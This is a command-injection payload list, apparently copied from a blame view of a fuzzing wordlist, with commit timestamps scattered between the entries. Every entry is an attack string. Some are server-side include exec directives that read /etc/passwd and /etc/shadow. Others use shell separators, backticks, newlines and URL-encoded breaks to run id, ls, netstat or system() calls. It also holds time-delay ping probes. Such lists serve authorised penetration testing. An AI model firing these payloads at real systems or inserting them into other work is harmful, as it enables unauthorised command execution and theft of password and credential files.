2017-07-14 21:40:31 +00:00
|
|
|
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
|
|
|
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
|
|
|
<!--#exec%20cmd="/usr/bin/id;-->
|
|
|
|
<!--#exec%20cmd="/usr/bin/id;-->
|
|
|
|
/index.html|id|
|
2020-01-17 01:41:12 +00:00
|
|
|
";id;"
|
|
|
|
';id;'
|
2017-07-14 21:40:31 +00:00
|
|
|
;id;
|
|
|
|
;id
|
|
|
|
;netstat -a;
|
2020-01-17 01:41:12 +00:00
|
|
|
"|id|"
|
|
|
|
'|id|'
|
2017-07-14 21:40:31 +00:00
|
|
|
|id
|
|
|
|
|/usr/bin/id
|
|
|
|
|id|
|
2020-01-17 01:41:12 +00:00
|
|
|
"|/usr/bin/id|"
|
|
|
|
'|/usr/bin/id|'
|
2017-07-14 21:40:31 +00:00
|
|
|
|/usr/bin/id|
|
2020-01-17 01:41:12 +00:00
|
|
|
"||/usr/bin/id|"
|
|
|
|
'||/usr/bin/id|'
|
2017-07-14 21:40:31 +00:00
|
|
|
||/usr/bin/id|
|
|
|
|
|id;
|
|
|
|
||/usr/bin/id;
|
|
|
|
;id|
|
|
|
|
;|/usr/bin/id|
|
2020-01-17 01:41:12 +00:00
|
|
|
"\n/bin/ls -al\n"
|
|
|
|
'\n/bin/ls -al\n'
|
2017-07-14 21:40:31 +00:00
|
|
|
\n/bin/ls -al\n
|
|
|
|
\n/usr/bin/id\n
|
|
|
|
\nid\n
|
|
|
|
\n/usr/bin/id;
|
|
|
|
\nid;
|
|
|
|
\n/usr/bin/id|
|
|
|
|
\nid|
|
|
|
|
;/usr/bin/id\n
|
|
|
|
;id\n
|
|
|
|
|usr/bin/id\n
|
|
|
|
|nid\n
|
|
|
|
`id`
|
|
|
|
`/usr/bin/id`
|
|
|
|
a);id
|
|
|
|
a;id
|
|
|
|
a);id;
|
|
|
|
a;id;
|
|
|
|
a);id|
|
|
|
|
a;id|
|
|
|
|
a)|id
|
|
|
|
a|id
|
|
|
|
a)|id;
|
|
|
|
a|id
|
|
|
|
|/bin/ls -al
|
|
|
|
a);/usr/bin/id
|
|
|
|
a;/usr/bin/id
|
|
|
|
a);/usr/bin/id;
|
|
|
|
a;/usr/bin/id;
|
|
|
|
a);/usr/bin/id|
|
|
|
|
a;/usr/bin/id|
|
|
|
|
a)|/usr/bin/id
|
|
|
|
a|/usr/bin/id
|
|
|
|
a)|/usr/bin/id;
|
|
|
|
a|/usr/bin/id
|
|
|
|
;system('cat%20/etc/passwd')
|
|
|
|
;system('id')
|
|
|
|
;system('/usr/bin/id')
|
|
|
|
%0Acat%20/etc/passwd
|
|
|
|
%0A/usr/bin/id
|
|
|
|
%0Aid
|
2020-01-17 01:41:12 +00:00
|
|
|
%22%0A/usr/bin/id%0A%22
|
|
|
|
%27%0A/usr/bin/id%0A%27
|
2017-07-14 21:40:31 +00:00
|
|
|
%0A/usr/bin/id%0A
|
|
|
|
%0Aid%0A
|
2020-01-17 01:41:12 +00:00
|
|
|
"& ping -i 30 127.0.0.1 &"
|
|
|
|
'& ping -i 30 127.0.0.1 &'
|
2017-07-14 21:40:31 +00:00
|
|
|
& ping -i 30 127.0.0.1 &
|
|
|
|
& ping -n 30 127.0.0.1 &
|
|
|
|
%0a ping -i 30 127.0.0.1 %0a
|
|
|
|
`ping 127.0.0.1`
|
|
|
|
| id
|
|
|
|
& id
|
|
|
|
; id
|
|
|
|
%0a id %0a
|
|
|
|
`id`
|
|
|
|
$;/usr/bin/id
|